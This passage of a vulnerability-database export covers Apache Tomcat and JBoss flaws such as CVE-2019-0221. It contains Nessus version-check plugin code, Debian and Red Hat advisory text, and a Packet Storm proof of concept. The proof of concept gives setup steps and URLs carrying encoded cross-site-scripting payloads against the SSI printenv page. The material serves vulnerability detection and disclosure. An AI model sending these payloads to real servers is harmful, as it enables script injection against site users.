security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated Red Hat JBoss Web Server 5.2.0 packages are now available for\nRed Hat Enterprise Linux 6, Red Hat Enterprise Linux 7, and Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster),\nthe PicketLink Vault extension for Apache Tomcat, and the Tomcat\nNative library.\n\nThis release of Red Hat JBoss Web Server 5.2 serves as a replacement\nfor Red Hat JBoss Web Server 5.1, and includes bug fixes,\nenhancements, and component upgrades, which are documented in the\nRelease Notes, linked to in the References.\n\nSecurity Fix(es) :\n\n* openssl: Side-channel vulnerability on SMT/Hyper-Threading\narchitectures (PortSmash) (CVE-2018-5407)\n\n* openssl: 0-byte record padding oracle (CVE-2019-1559)\n\n* tomcat: HTTP/2 connection window exhaustion on write, incomplete fix\nof CVE-2019-0199 (CVE-2019-10072)\n\n* tomcat: XSS in SSI printenv (CVE-2019-0221)\n\n* tomcat: Apache Tomcat HTTP/2 DoS (CVE-2019-0199)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n # https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/5.2/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfd5659a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3929\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-5407\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-0199\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-0221\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-0232\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-1559\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-10072\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0232\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-ecj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-javapackages-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-jboss-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster-tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-python-javapackages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7|8)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x / 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3929\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jws5-\") || rpm_exists(release:\"RHEL7\", rpm:\"jws5-\") || rpm_exists(release:\"RHEL8\", rpm:\"jws5-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss Web Server\");\n\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-ecj-4.12.0-1.redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-javapackages-tools-3.4.1-5.15.11.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-jboss-logging-3.3.2-1.Final_redhat_00001.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-mod_cluster-1.4.1-1.Final_redhat_00001.2.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-mod_cluster-tomcat-1.4.1-1.Final_redhat_00001.2.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-python-javapackages-3.4.1-5.15.11.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-admin-webapps-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-docs-webapp-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-el-3.0-api-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-javadoc-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-jsp-2.3-api-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-lib-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jws5-tomcat-native-1.2.21-34.redhat_34.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-1.2.21-34.redhat_34.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jws5-tomcat-native-debuginfo-1.2.21-34.redhat_34.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-debuginfo-1.2.21-34.redhat_34.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-selinux-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-servlet-4.0-api-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-vault-1.1.8-1.Final_redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-vault-javadoc-1.1.8-1.Final_redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-webapps-9.0.21-10.redhat_4.1.el6jws\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-ecj-4.12.0-1.redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-javapackages-tools-3.4.1-5.15.11.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-jboss-logging-3.3.2-1.Final_redhat_00001.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-mod_cluster-1.4.1-1.Final_redhat_00001.2.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-mod_cluster-tomcat-1.4.1-1.Final_redhat_00001.2.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-python-javapackages-3.4.1-5.15.11.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-admin-webapps-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-docs-webapp-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-el-3.0-api-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-javadoc-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-jsp-2.3-api-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-lib-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-1.2.21-34.redhat_34.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-debuginfo-1.2.21-34.redhat_34.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-selinux-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-servlet-4.0-api-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-vault-1.1.8-1.Final_redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-vault-javadoc-1.1.8-1.Final_redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-webapps-9.0.21-10.redhat_4.1.el7jws\")) flag++;\n\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-ecj-4.12.0-1.redhat_1.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-javapackages-tools-3.4.1-5.15.11.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-jboss-logging-3.3.2-1.Final_redhat_00001.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-mod_cluster-1.4.1-1.Final_redhat_00001.2.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-mod_cluster-tomcat-1.4.1-1.Final_redhat_00001.2.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-python-javapackages-3.4.1-5.15.11.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-admin-webapps-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-docs-webapp-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-el-3.0-api-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-javadoc-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-jsp-2.3-api-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-lib-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-1.2.21-34.redhat_34.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-debuginfo-1.2.21-34.redhat_34.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-selinux-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-servlet-4.0-api-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-vault-1.1.8-1.Final_redhat_1.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-vault-javadoc-1.1.8-1.Final_redhat_1.1.el8jws\")) flag++;\n if (rpm_check(release:\"RHEL8\", reference:\"jws5-tomcat-webapps-9.0.21-10.redhat_4.1.el8jws\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jws5-ecj / jws5-javapackages-tools / jws5-jboss-logging / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T15:12:45", "description": "Several issues were discovered in the Tomcat servlet and JSP engine, which could result in session fixation attacks, information disclosure, cross-site scripting, denial of service via resource exhaustion and insecure redirects.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-30T00:00:00", "type": "nessus", "title": "Debian DSA-4596-1 : tomcat8 - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-12418", "CVE-2019-17563"], "modified": "2023-02-23T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:tomcat8", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4596.NASL", "href": "https://www.tenable.com/plugins/nessus/132427", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4596. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132427);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/23\");\n\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8014\", \"CVE-2019-0199\", \"CVE-2019-0221\", \"CVE-2019-12418\", \"CVE-2019-17563\");\n script_xref(name:\"DSA\", value:\"4596\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Debian DSA-4596-1 : tomcat8 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several issues were discovered in the Tomcat servlet and JSP engine,\nwhich could result in session fixation attacks, information\ndisclosure, cross-site scripting, denial of service via resource\nexhaustion and insecure redirects.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4596\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the tomcat8 packages.\n\nFor the oldstable distribution (stretch), these problems have been\nfixed in version 8.5.50-0+deb9u1. This update also requires an updated\nversion of tomcat-native which has been updated to 1.2.21-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.1-java\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libtomcat8-embed-java\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libtomcat8-java\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-admin\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-common\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-docs\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-examples\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-user\", reference:\"8.5.50-0+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-07-13T15:57:46", "description": "", "cvss3": {}, "published": "2021-07-12T00:00:00", "type": "packetstorm", "title": "Apache Tomcat 9.0.0.M1 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0221"], "modified": "2021-07-12T00:00:00", "id": "PACKETSTORM:163457", "href": "https://packetstormsecurity.com/files/163457/Apache-Tomcat-9.0.0.M1-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS) \n# Date: 05/21/2019 \n# Exploit Author: Central InfoSec \n# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 \n# CVE : CVE-2019-0221 \n \n# Requirements: \n \n# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default. \n \n# A file (usually \"*.shtml\") with the \"printenv\" SSI directive must exist within the web application. \n \n# The file must be accessible. \n \n \n \n# Proof of Concept: \n \n# Install a Java Runtime Environment (JRE) \n \n# Download a vulnerable version of Tomcat and extract the contents \n \n# Modify line 19 of the conf\\context.xml file to globally enable privileged context \nContext privileged=\"true\"> \n \n# Modify conf\\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide \n \n# Put the following code in \"webapps/ROOT/ssi/printenv.shtml\" \n<html> \n<body> \nEcho:  \nPrintenv:  \n</body> \n</html> \n \n# Run Tomcat \ncd bin \ncatalina run \n \n# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the \"echo\" directive which escapes properly and the \"printenv\" directive which does not escape properly \nhttp://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E \nhttp://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E \n`\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163457/apachetomcat900m1-xss.txt"}], "debiancve": [{"lastseen": "2022-12-17T15:21:32", "description": "The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-05-28T22:29:00", "type": "debiancve", "title": "CVE-2019-0221", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2019-05-28T22:29:00", "id": "DEBIANCVE:CVE-2019-0221", "href": "https://security-tracker.debian.org/tracker/CVE-2019-0221", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "redhatcve": [{"lastseen": "2023-03-07T23:22:32", "description": "The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n#### Mitigation\n\nSSI is disabled in the default Tomcat configuration. The vulnerable printenv command is intended for debugging, and is recommended to not be enabled for a production website. \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-04-09T10:31:22", "type": "redhatcve", "title": "CVE-2019-0221", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 